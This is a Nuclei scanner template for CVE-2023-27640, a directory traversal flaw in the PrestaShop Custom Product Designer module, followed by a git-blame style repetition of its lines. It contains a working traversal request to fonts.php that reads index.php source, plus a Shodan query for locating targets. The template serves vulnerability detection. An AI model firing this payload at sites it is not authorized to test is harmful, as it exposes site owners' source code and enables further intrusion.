nuclei-templates/http/cves/2023/CVE-2023-27640.yaml

id: CVE-2023-27640
info:
  name: PrestaShop tshirtecommerce Directory Traversal
  author: MaStErChO
  severity: high
  description: |
   "The Custom Product Designer (tshirtecommerce) module for PrestaShop allows HTTP requests to be forged using POST and GET parameters, enabling a remote attacker to perform directory traversal on the system and view the contents of code files."
  reference:
    - https://www.cvedetails.com/cve/CVE-2023-27640/
    - https://security.friendsofpresta.org/module/2023/03/30/tshirtecommerce_cwe-22.html
  metadata:
    max-request: 1
    product: tshirtecommerce
    framework: prestashop
    shodan-query: http.component:"prestashop"
  tags: cve,cve2023,prestashop,lfi
http:
  - method: GET
    path:
      - "{{BaseURL}}/tshirtecommerce/fonts.php?name=2&type=./../index.php"

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains(base64_decode(body), "PrestaShop")
      - type: dsl
        dsl:
          - contains(base64_decode(body), "?php")
A festive templates 2023-12-31 16:09:36 +00:00			`id: CVE-2023-27640`
			`info:`
			`name: PrestaShop tshirtecommerce Directory Traversal`
			`author: MaStErChO`
			`severity: high`
			`description: \|`
			`"The Custom Product Designer (tshirtecommerce) module for PrestaShop allows HTTP requests to be forged using POST and GET parameters, enabling a remote attacker to perform directory traversal on the system and view the contents of code files."`
			`reference:`
			`- https://www.cvedetails.com/cve/CVE-2023-27640/`
			`- https://security.friendsofpresta.org/module/2023/03/30/tshirtecommerce_cwe-22.html`
			`metadata:`
			`max-request: 1`
			`product: tshirtecommerce`
			`framework: prestashop`
			`shodan-query: http.component:"prestashop"`
			`tags: cve,cve2023,prestashop,lfi`
			`http:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/tshirtecommerce/fonts.php?name=2&type=./../index.php"`
Formatin yaml second time 2023-12-31 16:39:40 +00:00
A festive templates 2023-12-31 16:09:36 +00:00			`matchers-condition: and`
			`matchers:`
Formatin yaml second time 2023-12-31 16:39:40 +00:00			`- type: dsl`
A festive templates 2023-12-31 16:09:36 +00:00			`dsl:`
			`- contains(base64_decode(body), "PrestaShop")`
Formatin yaml second time 2023-12-31 16:39:40 +00:00			`- type: dsl`
A festive templates 2023-12-31 16:09:36 +00:00			`dsl:`
			`- contains(base64_decode(body), "?php")`